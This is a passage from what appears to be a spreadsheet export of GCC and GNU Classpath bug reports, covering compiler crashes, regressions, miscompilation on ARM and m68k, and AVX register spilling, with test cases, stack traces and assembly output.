The relevant part of the F2008 Standard is 10.7.5.2.2 subsection 4.
Regards
Clive Page</t>
  </si>
  <si>
    <t>GCC-71308</t>
  </si>
  <si>
    <t>[7 Regression] ICE (segfault) in in gimple_fold_call gimple-fold.c:3060</t>
  </si>
  <si>
    <t>Compiling the following program with
  g++ -O2 input13.ii
fails with
input13.ii:15:1: internal compiler error: Segmentation fault
 }
 ^
0xd870bf crash_signal
        ../../gcc/toplev.c:333
0xb12c20 gimple_fold_call
        ../../gcc/gimple-fold.c:3060
0xb12c20 fold_stmt_1
        ../../gcc/gimple-fold.c:3778
0xdf737b fold_marked_statements
        ../../gcc/tree-inline.c:4925
0xe05d54 optimize_inline_calls(tree_node*)
        ../../gcc/tree-inline.c:5005
0x144b131 early_inliner(function*)
        ../../gcc/ipa-inline.c:2724
//====================== Test program:
class RubberBase
{
  void _undraw ()
  virtual void draw () = 0
  virtual ~ RubberBase ()
}
inline void
RubberBase::_undraw ()
{
  draw ()
}
RubberBase::~RubberBase ()
{
    _undraw ()
}</t>
  </si>
  <si>
    <t>GCC-44132</t>
  </si>
  <si>
    <t>[4.6 Regression] emutls is broken under a range of circumstances.</t>
  </si>
  <si>
    <t>wide-ranging fails:
		=== libgomp Summary for unix/-m32 ===
# of expected passes		2466
# of unexpected failures	24
# of unsupported tests		2
		=== libgomp Summary for unix/-m64 ===
# of expected passes		2365
# of unexpected failures	73
# of unsupported tests		2
OBJC TLS fails &gt; -O0 @m64 (all undefined symbols)
(Ditto Obj-C++ although I've not posted the tests yet....)
execution fails in libgomp/fortran.
plus fails like:
-lm   -m64 -o ./ctor-5.exe    (timeout = 60)
Undefined symbols:
  ___emutls_v._ZL3thr referenced from:
      __Z3foov.omp_fn.0 in ccPMFIjo.o
      foo()    in ccPMFIjo.o
      foo()    in ccPMFIjo.o
ld: symbol(s) not found
(possibly a manifestation of http://gcc.gnu.org/bugzilla/show_bug.cgi?id=44121 but I suspect additional to it)</t>
  </si>
  <si>
    <t>GCC-49799</t>
  </si>
  <si>
    <t>gcc arm generates illegal sbfx instruction</t>
  </si>
  <si>
    <t>Compile the following code with options -march=armv7-a -O2
extern __inline int bar(int a)
{
    int tmp
    if (a &lt;= 0) a ^= 0xFFFFFFFF
    return tmp - 1
}
void foo(short *K)
{
    short tmp
    short *pptr P[14]
    pptr = P
    tmp = bar(*K)
    *pptr = (*K &gt; 16
    if (*P &lt; tmp)
        *K++ = 0
}
gcc 4.7 generates
foo:
	ldrsh	r3 [r0 #0]
	sbfx	r3 r3 #17 #16    // A
	sxth	r3 r3
	cmn	r3 #1
	movlt	r3 #0
	strlth	r3 [r0 #0]	@ movhi
	bx	lr
The sbfx instruction is illegal since the bit position + width &gt; 32.
Although the source code is ill formed (function bar returns undefined value) compiler should never generate illegal instructions.
gcc4.6 has the same problem.</t>
  </si>
  <si>
    <t>GCC-259</t>
  </si>
  <si>
    <t>Strange input makes gcc to have an internal error</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Sat 27 May 2000 16:40:29 +0100 (BST)
 Original-Message-ID: 
 Hi
 I've managed to produce a strange internal error in gcc with a weird
 syntax error using .*
 GNU C++ version 2.95.2 19991024 (release) (i386-redhat-linux) compiled by
 GNU C version 2.95.2 19991024 (release).
 command line: g++ region.cc
 error:
 region.cc: In method `void FITS::region_rectangle::apply(FITS::image *
 double)':
 region.cc:38: Internal compiler error.
 region.cc:38: Please submit a full bug report.
 region.cc:38: See 
 for instructions.
 Jeremy
 -- 
 Jeremy Sanders   http://www-xray.ast.cam.ac.uk/~jss/
				     Institute of Astronomy Cambridge. UK
Release:
2.95.2
How-To-Repeat:
See attachments for region.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-40089</t>
  </si>
  <si>
    <t>Public type with public component which has a private type</t>
  </si>
  <si>
    <t>Please consider the following code:
module m
  implicit none
  private
  public :: public_t
  public :: public_sub
  !public :: private_t	(*)
  type :: private_t
    integer :: i
  end type
  type :: public_t
     type(private_t) pointer :: public_comp_with_private_type	!(#1)
     procedure(ifc)  nopass pointer :: ppc
  end type
  abstract interface
     integer function ifc ()
     end function
  end interface
  type(private_t) save public :: public_var_with_private_type	!(#2)
contains
  subroutine public_sub(arg)	!(#3)
    type(private_t) :: arg
  end subroutine
end module m
program test
use m
implicit none
type(public_t) :: x
integer :: j
print *public_var_with_private_type%i
j = x%ppc()  ! Error: Can't convert UNKNOWN to INTEGER(4)
end
With current trunk versions of gfortran this produces the error indicated in the last line of the program. Of course this error is bogus since ppc has an explicit interface (with an integer return type).
However I believe this program is invalid for the following reason: The type 'public_t' is public in the module m and it has a public component indicated by (#1) whose type is private in the module. So this component is accessible outside of the module but its type is not.
Up to now I was not able to find a rule in the F03 Standard which explicitly forbids this. But my common sense tells me that it should be invalid (hoping my common sense works alright).
Following the same reasoning the cases (#2) and (#3) should be invalid too but none of them is detected by gfortran. Unfortunately I could not find any other compiler which rejects the program (ifort and g95 accept it). Still I think it is invalid.
If the line indicated by (*) is uncommented the error message goes away. With this modification the program should be valid and all is fine.
Thanks to Juergen Reuter for reporting this.</t>
  </si>
  <si>
    <t>GCC-2304</t>
  </si>
  <si>
    <t>Broken link on http://gcc.gnu.org/onlinedocs/</t>
  </si>
  <si>
    <t xml:space="preserve">  Starting at http://gcc.gnu.org/onlinedocs/  the first item on the page says 
------------------
Latest releases
These are manuals for the latest full releases.
GCC 2.95.2 Manual 
------------------
and links to
http://gcc.gnu.org/onlinedocs/gcc-2.95.2/gcc_toc.html
which alas is 404.
------------------
Not Found
The requested URL /onlinedocs/gcc-2.95.2/gcc_toc.html was not found on this server.
------------------
  This probably happened while updating the docs for the 2.95.3 release and may be being fixed even as I write!
Release:
unknown</t>
  </si>
  <si>
    <t>dkorn</t>
  </si>
  <si>
    <t>GCC-15251</t>
  </si>
  <si>
    <t>[4.0 Regression] [m68k] bootstrap error</t>
  </si>
  <si>
    <t>HEAD 20040425 fails in the comparsion on m68k-linux gcc-3.4 works fine no
previous build tried after the creation of the 3.4 branch.
    Matthias
Bootstrap comparison failure!
./alias.o differs
./bitmap.o differs
./c-lex.o differs
./cfg.o differs
./coverage.o differs
./cppcharset.o differs
./cpppch.o differs
./cse.o differs
./cselib.o differs
./dbxout.o differs
./df.o differs
./dominance.o differs
./dwarf2out.o differs
./et-forest.o differs
./gcc.o differs
./gcov-dump.o differs
./gcov.o differs
./gcse.o differs
./genmodes.o differs
./ggc-page.o differs
./loop-iv.o differs
./optabs.o differs
./pretty-print.o differs
./ra-build.o differs
./ra-colorize.o differs
./real.o differs
./sreal.o differs
./stor-layout.o differs
./varasm.o differs
cp/call.o differs
cp/cxx-pretty-print.o differs
cp/decl.o differs
cp/except.o differs
cp/mangle.o differs
cp/name-lookup.o differs
cp/parser.o differs
cp/rtti.o differs
java/expr.o differs
java/jcf-dump.o differs
java/jcf-parse.o differs
java/parse-scan.o differs
java/parse.o differs
java/verify.o differs
objc/objc-act.o differs
make[3]: *** [gnucompare-lean] Error 1</t>
  </si>
  <si>
    <t>GCC-10781</t>
  </si>
  <si>
    <t>wrong class size and alignment with static class member</t>
  </si>
  <si>
    <t>Here is the testcase:
struct S {
    static double sval
    double get_sval() {return sval}
}
double S::sval=10000.0
Using the following compiling command:
/opt/cross/bin/powerpc64-linux-g++ -fdump-class-hierarchy a.C
we get the following class layout:
Class A
   size=8 align=8
A (0x40066100) 0 empty
The testcase only fails on 64 bit mode.
Release:
3.2</t>
  </si>
  <si>
    <t>GCC-23482</t>
  </si>
  <si>
    <t>[ColdFire] ICE in in final_scan_insn</t>
  </si>
  <si>
    <t>I reported this to the uClinux developer list (where I got my gcc cross-compiler
toolchain) and they recommended that I report it here.
I'm getting a compiler crash building a 3rd-party C++ lib (ACE) for uClinux. 
The lib compiles with g++ for every other platform known to man so I'm sure the
code is solid.  I was able to whittle down the offending code to the following:
---
class A
{
public:
  void foo()
}
class B
{
public:
  ~B()
}
void bar(A &amp; a)
{
  B b
  a.foo()
  char c[32768]
}
---
Donâ€™t ask me why but each statement is required to produce the crash.  When I
compile it with 3.4.3 (the 20050221 uClinux m68k toolchain distribution) I get
this:
% m68k-elf-g++ gcc-crash.cpp -m5307 -c
gcc-crash.cpp: In function `void bar(A&amp;)':
gcc-crash.cpp:19: error: insn does not satisfy its constraints:
(insn 24 106 107 (set (mem:SI (plus:SI (reg/f:SI 14 %a6)
                (reg:SI 0 %d0)) [0 S4 A16])
        (mem:SI (plus:SI (reg/f:SI 14 %a6)
                (reg:SI 1 %d1)) [0 S4 A16])) 26 {*m68k.md:760} (nil)
    (nil))
gcc-crash.cpp:19: internal compiler error: in final_scan_insn at final.c:2359
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Here are the details from the compiler:
% m68k-elf-g++ -v
Reading specs from /usr/local/m68k-uclinux-tools/lib/gcc/m68k-uclinux/3.4.3/specs
Configured with: /usr/local/src/uclinux-tools/gcc-3.4.3/configure
--target=m68k-uclinux --prefix=/usr/local/m68k-uclinux-tools
--enable-languages=cc++ --enable-multilib --enable-target-optspace
--with-gnu-ld --disable-nls --disable-__cxa_atexit --disable-c99
--disable-clocale --disable-c-mbchar --disable-long-long --disable-checking
--enable-threads=posix --disable-libstdcxx-pch
--enable-cxx-flags=-D_ISOC99_SOURCE -D_BSD_SOURCE
Thread model: posix
gcc version 3.4.3
BTW this code compiles fine with the 2.95.3 uClinux m68k toolchain but I need
to upgrade to 3.4.x.
Thanks
Keith.</t>
  </si>
  <si>
    <t>keith.nicewarner</t>
  </si>
  <si>
    <t>GCC-45930</t>
  </si>
  <si>
    <t>AIX: c++ -static-libgcc cores on throw/catch</t>
  </si>
  <si>
    <t>Created attachment 21986
Script with code to show the error.
A c++ program with -static-libgcc crashes on AIX (only) after throw.
&gt; terminate called after throwing an instance of 'DoException'
&gt; ./static-gcc-aix-no-catch.sh[52]: 226008 IOT/Abort trap(coredump)
It works fine without -static-libgcc on AIX. GNU/Linux x86 does
not have this problem.
A sample script is attached.
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/opt/freeware/libexec/gcc/powerpc-ibm-aix6.1.0.0/4.5.1/lto-wrapper
Target: powerpc-ibm-aix6.1.0.0
Configured with: ./configure --with-as=/usr/bin/as --with-ld=/usr/bin/ld --enable-languages=cc++ --prefix=/opt/freeware --enable-threads --enable-version-specific-runtime-libs --disable-nls --enable-decimal-float=dpd --host=powerpc-ibm-aix6.1.0.0
Thread model: aix
gcc version 4.5.1 (GCC)</t>
  </si>
  <si>
    <t>CVolkmann</t>
  </si>
  <si>
    <t>GCC-43382</t>
  </si>
  <si>
    <t>[C++0x] ICE with auto return type and variadic templates</t>
  </si>
  <si>
    <t>The following code causes an assert on a recent svn g++ with -std=c++0x. On g++ 4.4 it produces an error. I believe the code to be valid but am not 100% positive.
#include 
struct Range
{
	int lb
	int ub
	Range(int i int j) : lb(i) ub(j) {}
	Range(const Range
	Range() = default
}
template
T deref(const T&amp; t)
{ return t }
template  class Cont
	  class... Args&gt;
auto
deref(const Cont&amp; u int i Args... args)
-&gt; decltype(deref(u[i] args...))
{ deref(u[i] args...) }
template  class Cont
	  class... Args&gt;
auto
deref(const Cont&amp; u Range r Args... args)
-&gt; Cont
{
	typedef decltype(deref(u[0] args...)) member
	Cont retval
	for(int i = r.lb i &lt;= r.ub ++i)
	{
		retval.push_back(deref(u[i] args...))
	} 
	return retval
}
int main(void)
{
	std::vector&gt;&gt; v
	int i = deref(v 123)
	std::vector j = deref(v 1 Range(12) 3)
}</t>
  </si>
  <si>
    <t>CLASSPATH-27902</t>
  </si>
  <si>
    <t>Missing RE method</t>
  </si>
  <si>
    <t>The following exception seems to hold back JEdit from proper syntax highlighting.
[error] AWT-EventQueue-4: Exception during event dispatch:
[error] AWT-EventQueue-4: java.lang.AbstractMethodError: unimplemented interface method
[error] AWT-EventQueue-4:    at gnu.regexp.RE.makeCharIndexed(RE.java:2086)
[error] AWT-EventQueue-4:    at gnu.regexp.RE.isMatch(RE.java:1500)
[error] AWT-EventQueue-4:    at gnu.regexp.RE.isMatch(RE.java:1476)
[error] AWT-EventQueue-4:    at org.gjt.sp.jedit.syntax.TokenMarker.markKeyword(TokenMarker.java:700)
[error] AWT-EventQueue-4:    at org.gjt.sp.jedit.syntax.TokenMarker.markTokens(TokenMarker.java:232)
[error] AWT-EventQueue-4:    at org.gjt.sp.jedit.Buffer.markTokens(Buffer.java:2115)
[error] AWT-EventQueue-4:    at org.gjt.sp.jedit.textarea.ChunkCache.lineToChunkList(ChunkCache.java:752)
[error] AWT-EventQueue-4:    at org.gjt.sp.jedit.textarea.ChunkCache.updateChunksUpTo(ChunkCache.java:627)
[error] AWT-EventQueue-4:    at org.gjt.sp.jedit.textarea.ChunkCache.getLineInfo(ChunkCache.java:244)
[error] AWT-EventQueue-4:    at org.gjt.sp.jedit.textarea.ExtensionManager.paintScreenLineRange(ExtensionManager.java:93)
[error] AWT-EventQueue-4:    at org.gjt.sp.jedit.textarea.TextAreaPainter.paintComponent(TextAreaPainter.java:722)
[error] AWT-EventQueue-4:    at javax.swing.JComponent.paint(JComponent.java:1756)
[error] AWT-EventQueue-4:    at javax.swing.JComponent.paintDoubleBuffered(JComponent.java:2197)
[error] AWT-EventQueue-4:    at javax.swing.JComponent.paintImmediately2(JComponent.java:2145)
[error] AWT-EventQueue-4:    at javax.swing.JComponent.paintImmediately(JComponent.java:2131)
[error] AWT-EventQueue-4:    at javax.swing.RepaintManager.paintDirtyRegions(RepaintManager.java:551)
[error] AWT-EventQueue-4:    at javax.swing.RepaintManager$RepaintWorker.run(RepaintManager.java:127)
[error] AWT-EventQueue-4:    at java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:200)
[error] AWT-EventQueue-4:    at java.awt.EventQueue.dispatchEvent(EventQueue.java:465)
[error] AWT-EventQueue-4:    at java.awt.EventDispatchThread.run(EventDispatchThread.java:95)</t>
  </si>
  <si>
    <t>GCC-58553</t>
  </si>
  <si>
    <t>New fail in PASS-&gt;FAIL: gcc.c-torture/execute/memcpy-2.c execution on arm and aarch64</t>
  </si>
  <si>
    <t>Created attachment 30917
Preprocessed source
Jeff's change to the Jump-Threading code here:
http://gcc.gnu.org/ml/gcc-patches/2013-09/msg01910.html
Introduced a regression for arm and aarch64 in  gcc.c-torture/execute/memcpy-2.c such that I now see:
 *** EXIT code
 emu: host signal 0
When executing the testcase on a model with command line:
/work/gcc-clean/build-arm-none-eabi/install/bin/arm-none-eabi-gcc -B/work/gcc-clean/build-arm-none-eabi/obj/gcc2/gcc/ /work/gcc-clean/src/gcc/gcc/testsuite/gcc.c-torture/execute/memcpy-2.c -fno-diagnostics-show-caret -fdiagnostics-color=never -w -O3 -g -Wa-mno-warn-deprecated -lm -marm -march=armv7-a -mfpu=vfpv3-d16 -mfloat-abi=softfp -o /work/gcc-clean/build-arm-none-eabi/obj/gcc2/gcc/testsuite/gcc/memcpy-2.x -save-temps
I've attached the preprocessed source and the output from -fdump-tree-dom1-details</t>
  </si>
  <si>
    <t>GCC-78196</t>
  </si>
  <si>
    <t>[7 Regression] GCC self-test breaks native Windows x86 builds</t>
  </si>
  <si>
    <t>The GCC self-test added in r237144 breaks the native Windows builds (e.g. mingw-w64).
The test essentially does `-xc -S -c /dev/null -fself-test`
`/dev/null` is then converted into the Windows null device `nul` by the MSYS shell which is correct. But then the driver adds a filename to the name trying to write the output to `nul.s`. `nul` is a reserved filename on Windows. As such it's invalid to create this file and the call always fails using CreateFile.
This makes you unable to make native windows builds of GCC 7.</t>
  </si>
  <si>
    <t>tnfchris</t>
  </si>
  <si>
    <t>GCC-83479</t>
  </si>
  <si>
    <t>Register spilling in AVX code</t>
  </si>
  <si>
    <t>Here is snipped of code which performs some calculations on matrix. It repeatedly transforms some (N * N) matrix into (N-1 * N-1) one and returns final scalar value. gcc for some reason is not able to detect that intermediate values are not needed anymore and starts spilling. Code below is from gcc 7.2 trunk version also generates similar code. Code was compiled with -O3 -march=haswell.
BTW clang 5 properly handles this and does not spill.
[code]
#include immintrin.h
double test(const double data[9][8])
{
  __m256d vLastRow vLastCol vSqrtRow vSqrtCol
  __m256d v1 = _mm256_load_pd (
  __m256d v2 = _mm256_load_pd (
  __m256d v3 = _mm256_load_pd (
  __m256d v4 = _mm256_load_pd (
  __m256d v5 = _mm256_load_pd (
  __m256d v6 = _mm256_load_pd (
  __m256d v7 = _mm256_load_pd (
  __m256d v8 = _mm256_load_pd (
  // 8
  vLastRow = _mm256_load_pd (
  vSqrtRow = _mm256_sqrt_pd(vLastRow)
  vLastCol = _mm256_set1_pd(vLastRow[0])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v1 = (v1 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[1])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v2 = (v2 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[2])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v3 = (v3 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[3])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v4 = (v4 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[4])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v5 = (v5 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[5])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v6 = (v6 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[6])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v7 = (v7 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[7])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v8 = (v8 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  // 7
  vLastRow = v8
  vSqrtRow = _mm256_sqrt_pd(vLastRow)
  vLastCol = _mm256_set1_pd(vLastRow[0])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v1 = (v1 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[1])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v2 = (v2 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[2])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v3 = (v3 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[3])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v4 = (v4 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[4])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v5 = (v5 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[5])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v6 = (v6 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[6])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v7 = (v7 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  // 6
  vLastRow = v7
  vSqrtRow = _mm256_sqrt_pd(vLastRow)
  vLastCol = _mm256_set1_pd(vLastRow[0])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v1 = (v1 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[1])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v2 = (v2 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[2])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v3 = (v3 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[3])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v4 = (v4 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[4])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v5 = (v5 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[5])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v6 = (v6 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  // 5
  vLastRow = v6
  vSqrtRow = _mm256_sqrt_pd(vLastRow)
  vLastCol = _mm256_set1_pd(vLastRow[0])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v1 = (v1 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[1])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v2 = (v2 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[2])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v3 = (v3 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[3])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v4 = (v4 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[4])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v5 = (v5 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  // 4
  vLastRow = v5
  vSqrtRow = _mm256_sqrt_pd(vLastRow)
  vLastCol = _mm256_set1_pd(vLastRow[0])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v1 = (v1 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[1])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v2 = (v2 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[2])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v3 = (v3 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[3])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v4 = (v4 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  // 3
  vLastRow = v4
  vSqrtRow = _mm256_sqrt_pd(vLastRow)
  vLastCol = _mm256_set1_pd(vLastRow[0])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v1 = (v1 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[1])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v2 = (v2 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[2])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v3 = (v3 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  // 2
  vLastRow = v3
  vSqrtRow = _mm256_sqrt_pd(vLastRow)
  vLastCol = _mm256_set1_pd(vLastRow[0])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v1 = (v1 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  vLastCol = _mm256_set1_pd(vLastRow[1])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v2 = (v2 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  // 1
  vLastRow = v2
  vSqrtRow = _mm256_sqrt_pd(vLastRow)
  vLastCol = _mm256_set1_pd(vLastRow[0])
  vSqrtCol = _mm256_sqrt_pd(vLastCol)
  v1 = (v1 - vLastRow * vLastCol) * vSqrtRow * vSqrtCol
  return v1[0]
}
[/code]
[out]
test(double const (*) [8]):
  lea r10 [rsp+8]
  and rsp -32
  push QWORD PTR [r10-8]
  push rbp
  mov rbp rsp
  push r10
  sub rsp 1040
  vmovapd ymm7 YMMWORD PTR [rdi+576]
  vbroadcastsd ymm0 QWORD PTR [rbp-16]
  vpermpd ymm2 ymm7 0
  vsqrtpd ymm15 ymm7
  vpermpd ymm12 ymm7 255
  vsqrtpd ymm5 ymm2
  vsqrtpd ymm4 ymm12
  vmovapd YMMWORD PTR [rbp-560] ymm2
  vsqrtpd ymm2 ymm0
  vmovapd YMMWORD PTR [rbp-592] ymm5
  vpermpd ymm5 ymm7 85
  vmovapd YMMWORD PTR [rbp-528] ymm5
  vsqrtpd ymm6 ymm5
  vbroadcastsd ymm5 QWORD PTR [rbp+8]
  vmovapd YMMWORD PTR [rbp-208] ymm4
  vbroadcastsd ymm4 QWORD PTR [rbp+0]
  vmovapd ymm14 ymm5
  vsqrtpd ymm9 ymm5
  vfnmadd213pd ymm14 ymm7 YMMWORD PTR [rdi+448]
  vsqrtpd ymm8 ymm4
  vmovapd YMMWORD PTR [rbp-624] ymm6
  vpermpd ymm6 ymm7 170
  vmovapd YMMWORD PTR [rbp-496] ymm6
  vsqrtpd ymm1 ymm6
  vmulpd ymm6 ymm14 ymm15
  vmovapd YMMWORD PTR [rbp-656] ymm1
  vbroadcastsd ymm1 QWORD PTR [rbp-8]
  vsqrtpd ymm3 ymm1
  vmulpd ymm6 ymm6 ymm9
  vpermpd ymm13 ymm6 0
  vsqrtpd ymm14 ymm6
  vsqrtpd ymm10 ymm13
  vmovapd YMMWORD PTR [rbp-464] ymm13
  vpermpd ymm13 ymm6 170
  vmovapd YMMWORD PTR [rbp-688] ymm10
  vpermpd ymm10 ymm6 85
  vsqrtpd ymm11 ymm10
  vmovapd YMMWORD PTR [rbp-432] ymm10
  vmovapd YMMWORD PTR [rbp-720] ymm11
  vsqrtpd ymm11 ymm13
  vmulpd ymm13 ymm6 ymm13
  vmovapd YMMWORD PTR [rbp-752] ymm11
  vpermpd ymm11 ymm6 255
  vsqrtpd ymm9 ymm11
  vmovapd YMMWORD PTR [rbp-144] ymm11
  vmovapd YMMWORD PTR [rbp-784] ymm9
  vmulpd ymm9 ymm6 ymm4
  vfnmadd213pd ymm4 ymm7 YMMWORD PTR [rdi+384]
  vmulpd ymm4 ymm4 ymm15
  vfmsub132pd ymm4 ymm9 ymm8
  vmulpd ymm5 ymm4 ymm14
  vmulpd ymm5 ymm5 ymm8
  vpermpd ymm4 ymm5 0
  vsqrtpd ymm11 ymm5
  vpermpd ymm10 ymm5 255
  vsqrtpd ymm8 ymm4
  vmovapd YMMWORD PTR [rbp-400] ymm4
  vmovapd YMMWORD PTR [rbp-816] ymm8
  vpermpd ymm8 ymm5 85
  vsqrtpd ymm9 ymm8
  vmovapd YMMWORD PTR [rbp-368] ymm8
  vsqrtpd ymm8 ymm10
  vmulpd ymm10 ymm10 ymm5
  vmovapd YMMWORD PTR [rbp-848] ymm9
  vpermpd ymm9 ymm5 170
  vsqrtpd ymm4 ymm9
  vmovapd YMMWORD PTR [rbp-176] ymm9
  vfnmadd213pd ymm12 ymm7 YMMWORD PTR [rdi+192]
  vmovapd YMMWORD PTR [rbp-912] ymm8
  vmulpd ymm8 ymm1 ymm5
  vmovapd YMMWORD PTR [rbp-80] ymm14
  vmulpd ymm9 ymm6 ymm0
  vmovapd YMMWORD PTR [rbp-880] ymm4
  vmulpd ymm4 ymm6 ymm1
  vfnmadd213pd ymm1 ymm7 YMMWORD PTR [rdi+320]
  vmulpd ymm1 ymm1 ymm15
  vfmsub231pd ymm4 ymm1 ymm3
  vmulpd ymm4 ymm4 ymm14
  vmovapd ymm14 ymm11
  vmovapd YMMWORD PTR [rbp-112] ymm14
  vfmsub132pd ymm4 ymm8 ymm3
  vmulpd ymm4 ymm4 ymm11
  vmulpd ymm4 ymm4 ymm3
  vpermpd ymm1 ymm4 0
  vpermpd ymm11 ymm4 170
  vpermpd ymm8 ymm4 255
  vsqrtpd ymm3 ymm1
  vmovapd YMMWORD PTR [rbp-336] ymm1
  vmovapd YMMWORD PTR [rbp-944] ymm3
  vpermpd ymm3 ymm4 85
  vsqrtpd ymm1 ymm3
  vmovapd YMMWORD PTR [rbp-304] ymm3
  vmulpd ymm3 ymm0 ymm4
  vmovapd YMMWORD PTR [rbp-976] ymm1
  vsqrtpd ymm1 ymm11
  vmulpd ymm11 ymm11 ymm4
  vmovapd YMMWORD PTR [rbp-1008] ymm1
  vsqrtpd ymm1 ymm8
  vmulpd ymm8 ymm8 ymm4
  vmovapd YMMWORD PTR [rbp-1040] ymm1
  vmulpd ymm1 ymm0 ymm5
  vfnmadd213pd ymm0 ymm7 YMMWORD PTR [rdi+256]
  vmulpd ymm0 ymm0 ymm15
  vfmsub231pd ymm9 ymm0 ymm2
  vmulpd ymm9 ymm9 YMMWORD PTR [rbp-80]
  vmulpd ymm0 ymm12 ymm15
  vmovapd ymm12 YMMWORD PTR [rbp-1040]
  vfmsub231pd ymm1 ymm9 ymm2
  vmulpd ymm1 ymm1 ymm14
  vsqrtpd ymm14 ymm4
  vfmsub132pd ymm1 ymm3 ymm2
  vmulpd ymm1 ymm1 ymm14
  vmulpd ymm1 ymm1 ymm2
  vpermpd ymm2 ymm1 0
  vpermpd ymm9 ymm1 85
  vsqrtpd ymm3 ymm2
  vmovapd YMMWORD PTR [rbp-272] ymm2
  vsqrtpd ymm2 ymm9
  vmovapd YMMWORD PTR [rbp-240] ymm9
  vpermpd ymm9 ymm1 170
  vmovapd YMMWORD PTR [rbp-1072] ymm3
  vsqrtpd ymm3 ymm9
  vmovapd YMMWORD PTR [rbp-1104] ymm2
  vmulpd ymm9 ymm9 ymm1
